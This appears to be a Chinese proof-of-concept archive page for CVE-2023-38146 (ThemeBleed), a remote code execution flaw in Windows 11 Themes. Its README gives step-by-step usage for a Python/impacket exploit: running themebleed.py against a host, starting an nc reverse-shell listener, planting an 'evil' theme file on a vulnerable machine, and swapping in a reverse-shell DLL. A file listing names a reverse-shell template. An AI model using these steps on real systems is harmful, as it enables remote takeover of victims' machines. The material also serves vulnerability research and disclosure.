关联漏洞
标题:
Microsoft Windows Themes 安全漏洞
(CVE-2023-38146)
描述:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows Themes存在安全漏洞。攻击者利用该漏洞可以远程执行代码。以下产品和版本受到影响:Windows 11 version 21H2 for x64-based Systems,Windows 11 version 21H2 for ARM64-based Systems,Windows 11 Version 22H2 for ARM64-based Systems,Wi
描述
PoC for the ThemeBleed Windows 11 CVE-2023-38146 written in python using impacket
介绍
# PoC for the ThemeBleed CVE-2023-38146 exploit (Windows 11 Themes)
Heavily inspired by https://github.com/gabe-k/themebleed which only runs on windows (the reason why i decided to write this).
Used modified code from the impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
Useful stuff: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
Blog Post:
https://jnns.de/posts/cve-2023-38146-poc/
## How to use this:
Install the requirements and run the application:
```bash
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
```
Use the "evil_theme.theme" or "evil_theme.themepack" on a vulnerable machine.
Profit!
## Custom DLL File:
Place a DLL with an exported function "VerifyThemeVersion" in the
"./td/" folder named "Aero.msstyles_vrf_evil.dll". You should be able to find an example DLL by using google or use my example https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.
```bash
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
```
文件快照
[4.0K] /data/pocs/c65094d0ab39270313a0d9840ea91a3d50a924c9
├── [1.2K] README.md
├── [ 19] requirements.txt
├── [1.8K] rev_shell_template.cpp
├── [4.0K] tb
│ ├── [1.4M] Aero.msstyles
│ └── [1.4M] Aero.msstyles_vrf.dll
├── [ 13K] themebleed.py
└── [ 369] theme_template.theme
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。